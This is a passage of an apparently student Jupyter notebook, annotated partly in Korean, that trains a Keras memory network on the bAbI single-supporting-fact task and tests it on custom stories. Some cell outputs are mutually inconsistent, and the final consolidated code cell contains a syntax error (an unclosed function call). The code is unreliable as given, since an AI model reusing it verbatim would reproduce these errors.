"max_story_len = (max(all_story_lens))", "_____no_output_____" ], [ "max_question_len = max([len(data[1]) for data in all_data])", "_____no_output_____" ] ], [ [ "# 이제 Babi 데이터의 문장을 벡터로 만들자", "_____no_output_____" ], [ "First, we will go through a manual process of how to vectorize the data, and then we will create a function that does this automatically for us. 
", "_____no_output_____" ] ], [ [ "import keras\n\nprint( keras.__version__ )\n\n\nfrom keras.preprocessing.sequence import pad_sequences\n\nfrom keras.preprocessing.text import Tokenizer\n", "Using TensorFlow backend.\n" ], [ "#Create an instance of the tokenizer object:\n\ntokenizer = Tokenizer(filters = [])\n\ntokenizer.fit_on_texts(vocab)", "_____no_output_____" ], [ "#Dictionary that maps every word in our vocab to an index\n# It has been automatically lowercased\n#This tokenizer can give different indexes for different words depending on when we run it\n\n\ntokenizer.word_index", "_____no_output_____" ], [ "#Tokenize the stories, questions and answers:\ntrain_story_text = []\ntrain_question_text = []\ntrain_answers = []", "_____no_output_____" ], [ "#Separating each of the elements\n\nfor story,question,answer in train_data:\n train_story_text.append(story)\n train_question_text.append(question) \n train_answers.append(answer)\n ", "_____no_output_____" ], [ "#Coverting the text into the indexes \n\ntrain_story_seq = tokenizer.texts_to_sequences(train_story_text)", "_____no_output_____" ], [ "#Create a function for vectorizing the stories, questions and answers:\n\ndef vectorize_stories(data,word_index = tokenizer.word_index, max_story_len = max_story_len, max_question_len = max_question_len):\n #vectorized stories:\n X = []\n #vectorized questions:\n Xq = []\n #vectorized answers:\n Y = []\n \n for story, question, answer in data:\n #Getting indexes for each word in the story\n x = [word_index[word.lower()] for word in story]\n #Getting indexes for each word in the story\n xq = [word_index[word.lower()] for word in question]\n #For the answers\n y = np.zeros(len(word_index) + 1) #Index 0 Reserved when padding the sequences\n y[word_index[answer]] = 1\n \n X.append(x)\n Xq.append(xq)\n Y.append(y)\n \n #Now we have to pad these sequences:\n return(pad_sequences(X,maxlen=max_story_len), pad_sequences(Xq, maxlen=max_question_len), np.array(Y))\n ", "_____no_output_____" ], [ "inputs_train, questions_train, answers_train = vectorize_stories(train_data)", "_____no_output_____" ], [ "inputs_test, questions_test, answers_test = vectorize_stories(test_data)", "_____no_output_____" ], [ "inputs_train[3]", "_____no_output_____" ], [ "# train_story_text[3]\n\ntrain_story_text[0]", "_____no_output_____" ], [ "# train_story_seq[3]\n\ntrain_story_seq[0]", "_____no_output_____" ], [ "train_answers[3]", "_____no_output_____" ], [ "answers_train[3]", "_____no_output_____" ] ], [ [ "# 교재 36페이지의 input-output mapping 참고\n\n\n# 벡터 대응시키는 모델 (뉴럴네트워크)", "_____no_output_____" ] ], [ [ "#Imports\n\nfrom keras.models import Sequential, Model\n\nfrom keras.layers.embeddings import Embedding\n\nfrom keras.layers import Input, Activation, Dense, Permute, Dropout, add, dot, concatenate, LSTM", "_____no_output_____" ], [ "# We need to create the placeholders \n#The Input function is used to create a keras tensor\n#PLACEHOLDER shape = (max_story_len,batch_size)\n#These are our placeholder for the inputs, ready to recieve batches of the stories and the questions\n\ninput_sequence = Input((max_story_len,)) #As we dont know batch size yet\n\nquestion = Input((max_question_len,))", "_____no_output_____" ], [ "print( input_sequence )\n\nprint( question )", "Tensor(\"input_1:0\", shape=(None, 156), dtype=float32)\nTensor(\"input_2:0\", shape=(None, 6), dtype=float32)\n" ] ], [ [ "# encocder + decoder \n\n## 교재 129 페이지 참고\n\n![title](images/babiMNN.png)", "_____no_output_____" ], [ "On the left part of the previous image 
we can see a representation of a single layer of this model. Two different embeddings are calculated for each sentence, A and C. Also, the query or question q is embedded, using the B embedding.\n\nThe A embeddings mi, are then computed using an inner product with the question embedding u (this is the part where the attention is taking place, as by computing the inner product between these embeddings what we are doing is looking for matches of words from the query and the sentence, to then give more importance to these matches using a Softmax function on the resulting terms of the dot product).\n\nLastly, we compute the output vector o using the embeddings from C (ci), and the weights or probabilities pi obtained from the dot product. With this output vector o, the weight matrix W, and the embedding of the question u, we can finally calculate the predicted answer a hat.\n\nTo build the entire network, we just repeat these procedure on the different layers, using the predicted output from one of them as the input for the next one. This is shown on the right part of the previous image.\n\n\n\n\n\n\nThey have to have the same dimension as the data that will be fed, and can also have a batch size defined, although we can leave it blank if we dont know it at the time of creating the placeholders.\n\nNow we have to create the embeddings mentioned in the paper, A, C and B. An embedding turns an integer number (in this case the index of a word) into a d dimensional vector, where context is taken into account. Word embeddings are widely used in NLP and is one of the techniques that has made the field progress so much in the recent years.", "_____no_output_____" ] ], [ [ "#Create input encoder A:\n\ninput_encoder_m = Sequential()\ninput_encoder_m.add(Embedding(input_dim=vocab_len,output_dim = 64)) #From paper\ninput_encoder_m.add(Dropout(0.3))\n\n#Outputs: (Samples, story_maxlen,embedding_dim) -- Gives a list of the lenght of the samples where each item has the\n#lenght of the max story lenght and every word is embedded in the embbeding dimension", "_____no_output_____" ], [ "#Create input encoder C:\n\ninput_encoder_c = Sequential()\ninput_encoder_c.add(Embedding(input_dim=vocab_len,output_dim = max_question_len)) #From paper\ninput_encoder_c.add(Dropout(0.3))\n\n#Outputs: (samples, story_maxlen, max_question_len)", "_____no_output_____" ], [ "#Create question encoder:\n#Create input encoder B:\n\nquestion_encoder = Sequential()\nquestion_encoder.add(Embedding(input_dim=vocab_len,output_dim = 64,input_length=max_question_len)) #From paper\nquestion_encoder.add(Dropout(0.3))\n\n#Outputs: (samples, question_maxlen, embedding_dim)", "_____no_output_____" ], [ "#Now lets encode the sequences, passing the placeholders into our encoders:\n\ninput_encoded_m = input_encoder_m(input_sequence)\ninput_encoded_c = input_encoder_c(input_sequence)\nquestion_encoded = question_encoder(question)", "_____no_output_____" ] ], [ [ "## ++++++++++++++++++++++++\n\nOnce we have created the two embeddings for the input sentences, and the embeddings for the questions, we can start defining the operations that take place in our model. As mentioned previously, we compute the attention by doing the dot product between the embedding of the questions and one of the embeddings of the stories, and then doing a softmax. 
The following block shows how this is done:", "_____no_output_____" ] ], [ [ "#Use dot product to compute similarity between input encoded m and question \n#Like in the paper:\n\nmatch = dot([input_encoded_m,question_encoded], axes = (2,2))\nmatch = Activation('softmax')(match)", "_____no_output_____" ] ], [ [ "After this, we need to calculate the output o adding the match matrix with the second input vector sequence, and then calculate the response using this output and the encoded question.", "_____no_output_____" ] ], [ [ "#For the response we want to add this match with the ouput of input_encoded_c\n\nresponse = add([match,input_encoded_c])\nresponse = Permute((2,1))(response) #Permute Layer: permutes dimensions of input", "_____no_output_____" ], [ "#Once we have the response we can concatenate it with the question encoded:\n\nanswer = concatenate([response, question_encoded])", "_____no_output_____" ], [ "answer", "_____no_output_____" ] ], [ [ "Lastly, once this is done we add the rest of the layers of the model, adding an LSTM layer (instead of an RNN like in the paper), a dropout layer and a final softmax to compute the output.", "_____no_output_____" ] ], [ [ "# Reduce the answer tensor with a RNN (LSTM)\n\nanswer = LSTM(32)(answer)", "_____no_output_____" ], [ "#Regularization with dropout:\n\nanswer = Dropout(0.5)(answer)\n\n#Output layer:\n\nanswer = Dense(vocab_len)(answer) #Output shape: (Samples, Vocab_size) #Yes or no and all 0s", "_____no_output_____" ], [ "#Now we need to output a probability distribution for the vocab, using softmax:\nanswer = Activation('softmax')(answer)", "_____no_output_____" ] ], [ [ "# 모델 Model !!\n\nNotice here that the output is a vector of the size of the vocabulary (that is, the length of the number of words known by the model), where all the positions should be zero except the ones at the indexes of ‘yes’ and ‘no’.", "_____no_output_____" ] ], [ [ "#Now we build the final model:\n\nmodel = Model([input_sequence,question], answer)\n", "_____no_output_____" ], [ "model.compile(optimizer='rmsprop', loss = 'categorical_crossentropy', metrics = ['accuracy'])\n\n#Categorical instead of binary cross entropy as because of the way we are training\n#we could actually see any of the words from the vocab as output\n#however, we should only see yes or no", "_____no_output_____" ], [ "model.summary()", "Model: \"model_1\"\n__________________________________________________________________________________________________\nLayer (type) Output Shape Param # Connected to \n==================================================================================================\ninput_1 (InputLayer) (None, 156) 0 \n__________________________________________________________________________________________________\ninput_2 (InputLayer) (None, 6) 0 \n__________________________________________________________________________________________________\nsequential_1 (Sequential) multiple 2432 input_1[0][0] \n__________________________________________________________________________________________________\nsequential_4 (Sequential) (None, 6, 64) 2432 input_2[0][0] \n__________________________________________________________________________________________________\ndot_1 (Dot) (None, 156, 6) 0 sequential_1[1][0] \n sequential_4[1][0] \n__________________________________________________________________________________________________\nactivation_1 (Activation) (None, 156, 6) 0 dot_1[0][0] 
\n__________________________________________________________________________________________________\nsequential_3 (Sequential) multiple 228 input_1[0][0] \n__________________________________________________________________________________________________\nadd_1 (Add) (None, 156, 6) 0 activation_1[0][0] \n sequential_3[1][0] \n__________________________________________________________________________________________________\npermute_1 (Permute) (None, 6, 156) 0 add_1[0][0] \n__________________________________________________________________________________________________\nconcatenate_1 (Concatenate) (None, 6, 220) 0 permute_1[0][0] \n sequential_4[1][0] \n__________________________________________________________________________________________________\nlstm_1 (LSTM) (None, 32) 32384 concatenate_1[0][0] \n__________________________________________________________________________________________________\ndropout_5 (Dropout) (None, 32) 0 lstm_1[0][0] \n__________________________________________________________________________________________________\ndense_1 (Dense) (None, 38) 1254 dropout_5[0][0] \n__________________________________________________________________________________________________\nactivation_2 (Activation) (None, 38) 0 dense_1[0][0] \n__________________________________________________________________________________________________\ndropout_6 (Dropout) (None, 38) 0 activation_2[0][0] \n__________________________________________________________________________________________________\ndense_2 (Dense) (None, 38) 1482 dropout_6[0][0] \n__________________________________________________________________________________________________\nactivation_3 (Activation) (None, 38) 0 dense_2[0][0] \n__________________________________________________________________________________________________\nactivation_4 (Activation) (None, 38) 0 activation_3[0][0] \n__________________________________________________________________________________________________\nactivation_5 (Activation) (None, 38) 0 activation_4[0][0] \n==================================================================================================\nTotal params: 40,212\nTrainable params: 40,212\nNon-trainable params: 0\n__________________________________________________________________________________________________\n" ] ], [ [ "With these two lines we build the final model, and compile it, that is, define all the maths that will be going on in the background by specifying an optimiser, a loss function and a metric to optimise.\n\nNow its time to train the model, here we need to define the inputs to the training, (the input stories, questions and answers), the batch size that we will be feeding the model with (that is, how many inputs at once), and the number of epochs that we will train the model for (that is, how many times the model will go through the training data in order to update the weights). I used 1000 epochs and obtained an accuracy of 98%, but even with 100 to 200 epochs you should get some pretty good results.\n\nNote that depending on your hardware, this training might take a while. Just relax, sit back, keep reading Medium and wait until its done.\n\nAfter its completed the training you might be left wondering “am I going to have to wait this long every time I want to use the model?” the obvious answer my friend is, NO. Keras allows developers to save a certain model it has trained, with the weights and all the configurations. 
The following block of code shows how this is done.", "_____no_output_____" ], [ "## +++++++++++++++++++++++++++++", "_____no_output_____" ] ], [ [ "print( answers_train.shape )\nanswers_train[0]", "(10000, 38)\n" ], [ "val=model.evaluate( [inputs_train, questions_train], answers_train, \n batch_size = 32)\nprint(val)\n\n# 길이가 38인 곳으로 랜덤하게 가기에, 확률적으로 1/38\n#####################################################", "10000/10000 [==============================] - 1s 104us/step\n[3.637576064300537, 0.0]\n" ], [ "my_story = 'Sandra picked up the milk . Mary travelled left . '\nmy_question = 'Sandra got the milk ?'\n\nmy_data = [(my_story.split(), my_question.split(),'yes')]\nmy_story, my_ques, my_ans = vectorize_stories(my_data)\n\npred_results = model.predict(([my_story,my_ques]))\nval_max = np.argmax(pred_results[0])\n\nprint(pred_results[0][val_max])\n \n# 맟출 확률이 1/38\n##################", "0.026316524\n" ] ], [ [ "# +++++++++++++++++++++++++++++++++\n\n<p> &nbsp;\n\n\n\n# 여기의 숫자 ? 확률적으로 !", "_____no_output_____" ], [ "# 깡통인 모델에 이미 학습한 것을 주입하자\n\n\n\n모델 학습과정 설정하기\n\n 학습하기 전에 학습에 대한 설정을 수행합니다.\n 손실 함수 및 최적화 방법을 정의합니다.\n 케라스에서는 compile() 함수를 사용합니다.\n \n모델 학습시키기\n\n 훈련셋을 이용하여 구성한 모델로 학습시킵니다.\n 케라스에서는 fit() 함수를 사용합니다.\n \n학습과정 살펴보기\n\n 모델 학습 시 훈련셋, 검증셋의 손실 및 정확도를 측정합니다.\n 반복횟수에 따른 손실 및 정확도 추이를 보면서 학습 상황을 판단합니다.\n \n모델 평가하기\n\n 준비된 시험셋으로 학습한 모델을 평가합니다.\n 케라스에서는 evaluate() 함수를 사용합니다.\n \n모델 사용하기\n\n 임의의 입력으로 모델의 출력을 얻습니다.\n 케라스에서는 predict() 함수를 사용합니다.", "_____no_output_____" ], [ "# 공부한 AI 두뇌 model 을 불러온다.", "_____no_output_____" ] ], [ [ "del model\n##################################################\n#To load a model that we have already trained and saved:\n# batch_size=32 , epochs=350 이상 훈련시킨 모델 부름 \n\n\n\nfrom keras.models import load_model\n\n\n# returns a compiled model\n# identical to the previous one\n\n##################################################\n##################################################\n\nmodel = load_model('./data_out/babi_chatbot_50.h5')\n\n###################################################\n###################################################", "C:\\WinPython37F\\python-3.7.2.amd64\\lib\\site-packages\\tensorflow_core\\python\\framework\\indexed_slices.py:424: UserWarning: Converting sparse IndexedSlices to a dense Tensor of unknown shape. This may consume a large amount of memory.\n \"Converting sparse IndexedSlices to a dense Tensor of unknown shape. 
\"\n" ] ], [ [ "# ===============================\n\n\n# 더 공부를 시키자 !!\n\n# 공부한 것을 저장시키자 !!\n\n<p> &nbsp;", "_____no_output_____" ], [ "\n\n## Training and testing the model\n\n## Saving the model +++++++++++\n\n## 학습 평가를 Matplotlib 그래프로 표현", "_____no_output_____" ] ], [ [ "\"\"\"\nimport keras.callbacks import EarlyStopping\n\nearly_stopping_callback = EarlyStopping( monitor='val_loss', patience=100)\n\nhistory = model.fit([inputs_train,questions_train],answers_train, \n batch_size = 32, epochs = 150, \n validation_data = ([inputs_test,questions_test],answers_test),\n callbacks=[early_stopping_callback] )\n\"\"\"\n# 위의 코드는 학습데이터 정확도는 up, 테스트 데이터 정확도가 정체된 오버휫팅때 스탑시킴\n######################################################################################\n\n\n\nhistory = model.fit([inputs_train,questions_train],answers_train, \n batch_size = 32, epochs = 5, \n validation_data = ([inputs_test,questions_test],answers_test) )\n\nval=model.evaluate( [inputs_train,questions_train], answers_train, \n batch_size = 32)\n\n\nprint(val)\n\n\n######################################\n\n\nfilename = './data_out/babi_chatbot.h5'\n\nmodel.save(filename)\n\n\n# 길이가 38인 곳으로 랜덤하게 가기에, 확률적으로 1/38\n\n\n########################################\n\n# model.fit 안하면 history 없어서 ==> 에러 \n# NameError: name 'history' is not defined\n\n\n#Lets plot the increase of accuracy as we increase the number of training epochs\n#We can see that without any training the acc is about 50%, random guessing\n\nimport matplotlib.pyplot as plt\n%matplotlib inline\n\nprint(history.history.keys())\n# summarize history for accuracy\n\nplt.figure(figsize=(12,12))\nplt.plot(history.history['accuracy'])\nplt.plot(history.history['val_accuracy'])\nplt.title('model accuracy')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()\n\n", "Train on 10000 samples, validate on 1000 samples\nEpoch 1/5\n10000/10000 [==============================] - 5s 481us/step - loss: 2.4825 - accuracy: 0.4756 - val_loss: 0.6502 - val_accuracy: 0.6070\nEpoch 2/5\n10000/10000 [==============================] - 4s 392us/step - loss: 0.6337 - accuracy: 0.6368 - val_loss: 0.5686 - val_accuracy: 0.6950\nEpoch 3/5\n10000/10000 [==============================] - 4s 400us/step - loss: 0.5334 - accuracy: 0.7335 - val_loss: 0.4622 - val_accuracy: 0.7970\nEpoch 4/5\n10000/10000 [==============================] - 4s 394us/step - loss: 0.4368 - accuracy: 0.8091 - val_loss: 0.4093 - val_accuracy: 0.8230\nEpoch 5/5\n10000/10000 [==============================] - 4s 379us/step - loss: 0.4026 - accuracy: 0.8313 - val_loss: 0.4117 - val_accuracy: 0.8350\n10000/10000 [==============================] - 1s 90us/step\n[0.34663112587928774, 0.8614000082015991]\ndict_keys(['val_loss', 'val_accuracy', 'loss', 'accuracy'])\n" ] ], [ [ "# batch_size = 32 와 epochs=50 의 시작\n\nTrain on 10000 samples, validate on 1000 samples\n\nEpoch 1/50\n 10000/10000 [==============================] - 7s 686us/step - loss: 0.8794 - accuracy: 0.5036 - val_loss: 0.6941 - val_accuracy: 0.5030\n\nEpoch 2/50\n 10000/10000 [==============================] - 6s 570us/step - loss: 0.7019 - accuracy: 0.4998 - val_loss: 0.6937 - val_accuracy: 0.4970\n\n\n\n# batch_size = 64 와 epochs=50 의 끝\n\nEpoch 48/50\n 10000/10000 [==============================] - 5s 530us/step - loss: 0.3619 - accuracy: 0.8410 - val_loss: 0.4453 - val_accuracy: 0.7980\n\nEpoch 49/50\n 10000/10000 [==============================] - 5s 542us/step - loss: 0.3586 - accuracy: 0.8406 - val_loss: 0.4490 - 
val_accuracy: 0.7950\n\nEpoch 50/50\n 10000/10000 [==============================] - 5s 547us/step - loss: 0.3553 - accuracy: 0.8424 - val_loss: 0.4508 - val_accuracy: 0.8030\n\n\n\n=\n=\n=\n=\n\n# batch_size = 32 에 epochs=50 결과\n\n\n![title](images/babi_train_start.png)\n\n# batch_size = 32 에 epochs=100 결과\n\n![title](images/babi_train.png)\n\n\n", "_____no_output_____" ], [ "## [문제] 학습데이터의 정확도는 높아지는데, 테스트 데이터는 정지됨 !!\n\n### 과적합 over-fitting의 개념을 이해하고, 테스트 데이터 정확도를 높이는 방법을 탐구 !\n\n<p>\n \n### 1. 일만개의 학습데이터와 천개의 테스크 데이터로 나뉘어 있다. 데이터를 일만천개로 바꾸어, \n### 돌아가며 k-fold cross validation 하는 방법을 알아보라 (데이터의 양이 적은 경우에 필요)\n \n<p>\n \n### 2. Keras 모델의 한계일 수 있다. Hidden layer 갯수나 딥러닝 알고리즘을 바꾸어 학습을 시킨다, \n### 인터넷 등에서 새로운 여러가지 딥러닝 알고리즘을 알아보고, 이를 Babi 에 적용한다.\n ", "_____no_output_____" ], [ "## 현재의 딥러닝 모델 \n<pre>\nModel: \"model_1\"\n__________________________________________________________________________________________________\nLayer (type) Output Shape Param # Connected to \n==================================================================================================\ninput_1 (InputLayer) (None, 156) 0 \n__________________________________________________________________________________________________\ninput_2 (InputLayer) (None, 6) 0 \n__________________________________________________________________________________________________\nsequential_1 (Sequential) multiple 2432 input_1[0][0] \n__________________________________________________________________________________________________\nsequential_3 (Sequential) (None, 6, 64) 2432 input_2[0][0] \n__________________________________________________________________________________________________\ndot_1 (Dot) (None, 156, 6) 0 sequential_1[1][0] \n sequential_3[1][0] \n__________________________________________________________________________________________________\nactivation_1 (Activation) (None, 156, 6) 0 dot_1[0][0] \n__________________________________________________________________________________________________\nsequential_2 (Sequential) multiple 228 input_1[0][0] \n__________________________________________________________________________________________________\nadd_1 (Add) (None, 156, 6) 0 activation_1[0][0] \n sequential_2[1][0] \n__________________________________________________________________________________________________\npermute_1 (Permute) (None, 6, 156) 0 add_1[0][0] \n__________________________________________________________________________________________________\nconcatenate_1 (Concatenate) (None, 6, 220) 0 permute_1[0][0] \n sequential_3[1][0] \n__________________________________________________________________________________________________\nlstm_1 (LSTM) (None, 32) 32384 concatenate_1[0][0] \n__________________________________________________________________________________________________\ndropout_4 (Dropout) (None, 32) 0 lstm_1[0][0] \n__________________________________________________________________________________________________\ndense_1 (Dense) (None, 38) 1254 dropout_4[0][0] \n__________________________________________________________________________________________________\nactivation_2 (Activation) (None, 38) 0 dense_1[0][0] \n==================================================================================================\nTotal params: 38,730\nTrainable params: 38,730\nNon-trainable params: 0\n__________________________________________________________________________________________________\n</pre>\n\n\n", "_____no_output_____" ], [ "## ==========================================\n\n# 학습된 AI 두뇌 모델 evaluate 
!!!! \n\n\n# ===================================", "_____no_output_____" ] ], [ [ "# model.compile(optimizer='rmsprop', loss = 'categorical_crossentropy', metrics = ['accuracy'])\n# print( answers_train.shape ) ==> ( 10000, 38 ) one hot vector\n\n### train 에 대해서 evaluate 한다 //////// test 데이터로 하는 것과 차이 ?? ///////\n\nval=model.evaluate( [inputs_train,questions_train], answers_train, batch_size = 32)\n\n###################################################################################\n\n\nval \n\n# 50 때 0.88", "10000/10000 [==============================] - 1s 94us/step\n" ] ], [ [ "## ==========================================\n\n# 학습된 AI 두뇌 테스트를 위해 문제를 출제 !!!! \n\n\n# ====================================", "_____no_output_____" ] ], [ [ "#Lets check out the predictions on the test set:\n#These are just probabilities for every single word on the vocab\n# 테스트 데이터 기반의 prediction ##############################\n\n\npred_results = model.predict(([inputs_test,questions_test]))\n\nprint( pred_results )", "[[5.3464513e-09 4.7893756e-09 5.9277316e-09 ... 5.8098868e-09\n 6.7517063e-09 5.7777618e-09]\n [1.1304347e-08 9.6045669e-09 1.1915859e-08 ... 1.1772948e-08\n 1.3240343e-08 1.3179218e-08]\n [4.7399933e-08 3.1272307e-08 4.0516948e-08 ... 4.2989544e-08\n 4.5466496e-08 4.3368548e-08]\n ...\n [2.2156049e-08 1.7657909e-08 2.2862498e-08 ... 2.3986395e-08\n 2.4334682e-08 2.7791978e-08]\n [5.1913876e-08 3.6524860e-08 4.4735319e-08 ... 4.9788913e-08\n 5.2742969e-08 4.8548156e-08]\n [5.2890915e-08 3.6501500e-08 5.2736290e-08 ... 5.5532698e-08\n 5.7155237e-08 6.0597074e-08]]\n" ] ], [ [ "These results are an array, as mentioned earlier that contain in every position the probabilities of each of the words in the vocabulary being the answer to the question. If we look at the first element of this array, we will see a vector of the size of the vocabulary, where all the times are close to 0 except the ones corresponding to yes or no.\n\nOut of these, if we pick the index of the highest value of the array and then see to which word it corresponds to, we should find out if the answer is affirmative or negative.\n\nOne fun thing that we can do now, is create our own stories and questions, and feed them to the bot to see what he says!", "_____no_output_____" ] ], [ [ "my_story = 'Sandra picked up the milk . Mary travelled left . '\nmy_question = 'Sandra got the milk ?'\n\nmy_data = [(my_story.split(), my_question.split(),'yes')]\nmy_story, my_ques, my_ans = vectorize_stories(my_data)\n\npred_results = model.predict(([my_story,my_ques]))\nval_max = np.argmax(pred_results[0])\n\nprint(pred_results[0][val_max])\n \n# 맟출 확률이 1/38\n# 50 에서는 0.579\n# 100 dptj 0.69\n# 150 에서 0.54", "0.9167208\n" ], [ "#These are the probabilities for the vocab words using the 1st sentence\n\n\npred_results[0]", "_____no_output_____" ], [ "val_max = np.argmax(pred_results[0])", "_____no_output_____" ], [ "for key,val in tokenizer.word_index.items():\n if val == val_max:\n k = key\nprint(k)", "no\n" ], [ "#See probability:\n\npred_results[0][val_max]", "_____no_output_____" ] ], [ [ "# ================================", "_____no_output_____" ] ], [ [ "#Now, we can make our own questions using the vocabulary we have\n\nprint( len(vocab) )\nvocab\n\n# 'office': 1\n# '?': 37 == 마지막 index", "37\n" ], [ "my_story = 'Sandra picked up the milk . Mary travelled left . '", "_____no_output_____" ], [ "my_story.split()", "_____no_output_____" ] ], [ [ " my_story = 'Sandra picked up the milk . Mary travelled left . 
'\n my_question = 'Sandra got the milk ?'\n my_data = [(my_story.split(), my_question.split(),'yes')]\n my_story, my_ques, my_ans = vectorize_stories(my_data)\n pred_results = model.predict(([my_story,my_ques]))\n val_max = np.argmax(pred_results[0])\n print(pred_results[0][val_max])", "_____no_output_____" ] ], [ [ "my_question = 'Sandra got the milk ?'", "_____no_output_____" ], [ "my_question.split()", "_____no_output_____" ], [ "#Put the data in the same format as before\nmy_data = [(my_story.split(), my_question.split(),'yes')]", "_____no_output_____" ], [ "#Vectorize this data\nmy_story, my_ques, my_ans = vectorize_stories(my_data)", "_____no_output_____" ], [ "#Make the prediction\n\npred_results = model.predict(([my_story,my_ques]))\n\nprint( pred_results.shape )\nprint( 'yes : ', pred_results[0][26] )\nprint( 'no : ', pred_results[0][37] )\nprint( pred_results[0][26]/ pred_results[0][37] )\n\n# 50 일때 yes / no = 0.986 거의 같은 확률 0", "(1, 38)\nyes : 1.633283e-09\nno : 2.412464e-09\n0.6770186\n" ] ], [ [ " 'yes': 24,\n 'left': 25,\n 'to': 26,\n 'milk': 27,\n 'in': 28,\n 'moved': 29,\n 'discarded': 30,\n \n 'no': 31,", "_____no_output_____" ] ], [ [ "val_max = np.argmax(pred_results[0])\nprint( val_max )\n", "31\n" ], [ "#Correct prediction!\n\nfor key,val in tokenizer.word_index.items():\n if val == val_max:\n k = key\n \nprint(val)\nprint(k)", "37\nno\n" ], [ "#Confidence\npred_results[0][val_max]", "_____no_output_____" ] ], [ [ "# ====================================\n", "_____no_output_____" ] ], [ [ "my_story = 'Sandra picked up the milk . Sandra moved to the bathroom . '\nmy_question = 'Is the milk in the bathroom ?'\nmy_data = [(my_story.split(), my_question.split(),'yes')]\nmy_story, my_ques, my_ans = vectorize_stories(my_data)\npred_results = model.predict(([my_story,my_ques]))\nval_max = np.argmax(pred_results[0])\n\nprint(pred_results[0][val_max])\n###############################\n# 50 에서는 0.9748\n# 100 에서는 0.974858\n# 150 에서 0.6165\n\nmodel.evaluate([inputs_train,questions_train],answers_train, \n batch_size = 32)\n", "0.8649988\n10000/10000 [==============================] - 1s 90us/step\n" ], [ "val_max = np.argmax(pred_results[0])\nprint( val_max )\n\n#Correct prediction!\n\nfor key,val in tokenizer.word_index.items():\n if val == val_max:\n k = key\n \nprint(val)\nprint(k)", "29\n37\nyes\n" ] ], [ [ "# ====================================\n\n<p> &nbsp;\n\n \n한 장에 모아쓴 코드", "_____no_output_____" ] ], [ [ "import keras\nfrom keras.models import Sequential, Model\nfrom keras.layers.embeddings import Embedding\nfrom keras.layers import Permute, dot, add, concatenate\nfrom keras.layers import LSTM, Dense, Dropout, Input, Activation\nfrom keras.utils.data_utils import get_file\nfrom keras.preprocessing.sequence import pad_sequences\n\nfrom functools import reduce\nimport tarfile\nimport numpy as np\nimport re\n\nimport IPython\nimport matplotlib.pyplot as plt\nimport pandas as pd\n%matplotlib inline\n\ndef tokenize(sent):\n return [ x.strip() for x in re.split('(\\W+)+', sent) if x.strip()]\n\ndef parse_stories(lines):\n '''Parse stories provided in the bAbi tasks format\n '''\n data = []\n story = []\n for line in lines:\n line = line.decode('utf-8').strip()\n nid, line = line.split(' ', 1)\n nid = int(nid)\n if nid == 1:\n story = []\n if '\\t' in line:\n q, a, supporting = line.split('\\t')\n q = tokenize(q)\n # Provide all the substories\n substory = [x for x in story if x]\n data.append((substory, q, a))\n story.append('')\n else:\n sent = tokenize(line)\n 
story.append(sent)\n return data\n\n\ndef get_stories(f):\n data = parse_stories(f.readlines())\n flatten = lambda data: reduce(lambda x, y: x + y, data)\n data = [(flatten(story), q, answer) for story, q, answer in data]\n return data\n\ndef vectorize_stories(data, word_idx, story_maxlen, query_maxlen):\n X = []\n Xq = []\n Y = []\n for story, query, answer in data:\n x = [word_idx[w] for w in story]\n xq = [word_idx[w] for w in query]\n # let's not forget that index 0 is reserved\n y = np.zeros(len(word_idx) + 1)\n y[word_idx[answer]] = 1\n X.append(x)\n Xq.append(xq)\n Y.append(y)\n return (pad_sequences(X, maxlen=story_maxlen),\n pad_sequences(Xq, maxlen=query_maxlen), np.array(Y))\n\n\nclass TrainingVisualizer(keras.callbacks.History):\n def on_epoch_end(self, epoch, logs={}):\n super().on_epoch_end(epoch, logs)\n IPython.display.clear_output(wait=True)\n pd.DataFrame({key: value for key, value in self.history.items() if key.endswith('loss')}).plot()\n axes = pd.DataFrame({key: value for key, value in self.history.items() if key.endswith('acc')}).plot()\n axes.set_ylim([0, 1])\n plt.show() \n", "_____no_output_____" ], [ "try:\n path = get_file('babi-tasks-v1-2.tar.gz', origin='https://s3.amazonaws.com/text-datasets/babi_tasks_1-20_v1-2.tar.gz')\nexcept:\n print('Error downloading dataset, please download it manually:\\n'\n '$ wget http://www.thespermwhale.com/jaseweston/babi/tasks_1-20_v1-2.tar.gz\\n'\n '$ mv tasks_1-20_v1-2.tar.gz ~/.keras/datasets/babi-tasks-v1-2.tar.gz')\n raise\ntar = tarfile.open(path)\n\n\nchallenge = 'tasks_1-20_v1-2/en-10k/qa1_single-supporting-fact_{}.txt'\n\nprint('Extracting stories for the challenge: single_supporting_fact_10k')\ntrain_stories = get_stories(tar.extractfile(challenge.format('train')))\ntest_stories = get_stories(tar.extractfile(challenge.format('test')))\n\nprint( len(train_stories), len(test_stories) )\nprint('Number of training stories:', len(train_stories))\nprint('Number of test stories:', len(test_stories))\nprint( train_stories[0] )\n\nvocab = set()\nfor story, q, answer in train_stories + test_stories:\n vocab |= set(story + q + [answer])\nvocab = sorted(vocab)\n\n# Reserve 0 for masking via pad_sequences\nvocab_size = len(vocab) + 1\nstory_maxlen = max(map(len, (x for x, _, _ in train_stories + test_stories)))\nquery_maxlen = max(map(len, (x for _, x, _ in train_stories + test_stories)))\n\n\nword_idx = dict((c, i + 1) for i, c in enumerate(vocab))\nidx_word = dict((i+1, c) for i,c in enumerate(vocab))\ninputs_train, queries_train, answers_train = vectorize_stories(train_stories,\n word_idx,\n story_maxlen,\n query_maxlen)\ninputs_test, queries_test, answers_test = vectorize_stories(test_stories,\n word_idx,\n story_maxlen,\n \n \nprint('-------------------------')\nprint('Vocabulary:\\n',vocab,\"\\n\")\nprint('Vocab size:', vocab_size, 'unique words')\nprint('Story max length:', story_maxlen, 'words')\nprint('Query max length:', query_maxlen, 'words')\nprint('Number of training stories:', len(train_stories))\nprint('Number of test stories:', len(test_stories))\nprint('-------------------------')\n \nprint('-------------------------')\nprint('inputs: integer tensor of shape (samples, max_length)')\nprint('inputs_train shape:', inputs_train.shape)\nprint('inputs_test shape:', inputs_test.shape)\nprint('input train sample', inputs_train[0,:])\nprint('-------------------------')\n \nprint('-------------------------') \nprint('queries: integer tensor of shape (samples, max_length)') \nprint('queries_train shape:', queries_train.shape) 
